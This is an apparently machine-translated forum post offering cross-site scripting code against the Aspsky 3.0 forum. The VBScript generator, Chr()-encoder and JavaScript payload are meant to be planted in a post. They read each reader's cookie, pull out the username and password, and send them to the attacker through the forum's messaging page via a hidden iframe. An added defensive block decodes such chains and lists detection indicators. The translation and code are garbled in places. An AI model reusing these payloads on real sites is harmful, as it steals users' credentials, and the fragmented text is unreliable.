A perfect solution to the cookie frame problem in cross-site scripting

Source: Internet
Author: User

The Self.window way to see the wings of lust
In fact, I have always had a method that I never told anyone about.
After playing with it for a long time, I am announcing it now, hehe:
<script language=vbs>
Sub Changeq ()
If form1.loc.value= "" or form1.who.value= "" Then
MsgBox "No address or user name added?"
Exit Sub
End If
Loc=form1.loc.value
User=form1.who.value
Str= "rtadjacenthtml" ("BeforeEnd" "," "<div style=display:none&
Gt;<iframe id=sendmessage></iframe></div> ""): Call SE
Ndmessage.window.open ("" "& Loc &"/messanger.asp?action=send&touser= "
& user & "&title=" +mid (Document.cookie,instr LCase (Document.cookie),
"" "Password" "+9,10) +" "&message=" "+" "I am a Goo
D Boy "", "" _self "") "/>"
Form1.area.value=str
End Sub

</script>
<body>
<font size=7 Color=red>aspsky 3.0 Steal---c.z.y original </FONT>
<form name=form1>
Set send address: <input type=text name=loc size=50><br>
▲ The send address looks like: http://www.nnit30.com/newbbs (newbbs is the installation directory of the forum on the website; do not add a / at the end) <br>
User name sent: <input type=text name=who size=20>-------------
<input Type=button name=change value= Generate Code Onclick=changeq () ><br>
Generated code:) <textarea Name=area rows=10 cols=100></textarea>
</form>
</body>

After most of a day's work, the Aspsky 3.0 stealing code was changed to the following.
Put it in your post; as long as someone reads your post, their password is automatically sent to your
mailbox in the forum. Cool, right? In fact, I wrote mine in VBScript, while snwcwt wrote his in JavaScript.
The JavaScript version has no problem with double quotes and can span several lines of code, so it is more practical!!
But the effect is almost the same, ha. (Note: first change the send address in the following,
then write it all on one line.)

Simplified form: window.open(URL to open, window name, window size settings)
The URL to open:
The first part: http://xxx.xxx.xxx.xxx/xxxx/messanger.asp?action=send .....
The corresponding encoding is



For a different site this part has to be changed; pay attention to where it ends. The name of the user the message is sent to is also changed here.
For the encoding, look at the following code:


<script language=vbs>
Sub Main ()
Base=form1.text1.value
For I=1 to Len (base)
AA=ASC (Mid (base,i,1))
document.write "Chr (" & AA & ")" & "&"
Next
End Sub
</script>
<body ><form name=form1><table>
<tr><td>
<input Type=text Name=text1 size=40><br>
<input Type=button name=button1 onclick=main () value=change>
</td></tr>
</table></form></body>
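
A defensive counterpart to the encoder above, as an added example that is not part of the original page: a forum-side check that decodes `Chr(n)` chains in submitted post markup before inspecting it, and escapes the post for display. The indicator names and the sample post are assumptions constructed for illustration.

```javascript
// Added example (not the forum's code): decode Chr(n) chains, then inspect.
// A filter that only looks for quotes or literal keywords never sees text
// spelled as Chr(100)&Chr(111)..., so normalise it first.
const CHR_ONE = /chr\s*\(\s*(\d{1,3})\s*\)/gi;
const CHR_CHAIN =
  /chr\s*\(\s*\d{1,3}\s*\)(?:\s*[&+]\s*chr\s*\(\s*\d{1,3}\s*\))*/gi;

// Replace every chain (joined by & or +, any case, optional spaces)
// with the characters it spells.
function decodeChrChains(input) {
  return input.replace(CHR_CHAIN, (chain) =>
    [...chain.matchAll(CHR_ONE)]
      .map((m) => String.fromCharCode(Number(m[1])))
      .join(''));
}

// Hypothetical rule set built from the constructs this page relies on.
const INDICATORS = [
  { name: 'cookie-read', re: /document\.cookie/i },
  { name: 'hidden-frame', re: /<\s*iframe/i },
  { name: 'dom-injection', re: /insertAdjacentHTML/i },
  { name: 'message-endpoint', re: /messanger\.asp/i },
  { name: 'window-open', re: /window\.open/i },
];

function inspectPost(markup) {
  const decoded = decodeChrChains(markup);
  const hits = INDICATORS.filter((i) => i.re.test(decoded)).map((i) => i.name);
  return { decoded, hits, obfuscated: decoded !== markup };
}

// The actual fix: render user posts as text, never as markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed sample: the chain spells "document.cookie" with mixed case,
// spacing and both concatenation operators.
const SAMPLE_POST =
  'Nice thread! <i>Chr(100)&CHR (111) +chr(99)&Chr(117)&Chr(109)&Chr(101)' +
  '&Chr(110)&Chr(116)&Chr(46)&Chr(99)&Chr(111)&Chr(111)&Chr(107)&Chr(105)&Chr(101)</i>';

console.log(inspectPost(SAMPLE_POST));
console.log(escapeHtml(SAMPLE_POST));
```

Detection of this kind is a secondary control; escaping on output and keeping credentials out of script-readable cookies (an opaque session identifier marked HttpOnly) are what make the stored script ineffective.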

The second part: extracting the user name and password from the cookie

------------------------One more, in JS, to learn from----------------------------------

' username=\ '); var iuser1=mycookie.indexof (\ ' &\ ', IUSER0); if (iuser1==-1) iuser1=my
Cookie.length;var username=mycookie.substring (iuser0+9,iuser1); var Ipw0=mycookie
. indexOf (\ ' password=\ '); Ipw1=mycookie.indexof (\ ' &\ ', iPW0); if (ipw1==-1) Ipw1=myco
Okie.length;var password=mycookie.substring (IPW0+9,IPW1);d OCUMENT.BODY.INSERTADJ
Acenthtml (\ ' beforeend\ ', \ ' <div style=display:block><iframe id=sendmessage src=me
Ssanger.asp?action=new&touser=snwcwt></iframe></div>\ '); sendmessage.window.docum
Ent.location=\ ' cwt&title=\ ' +username+\ ' password &message=username=\ ' +username+\ ' password=\ ' +pa
Ssword+\ '; ') ' />


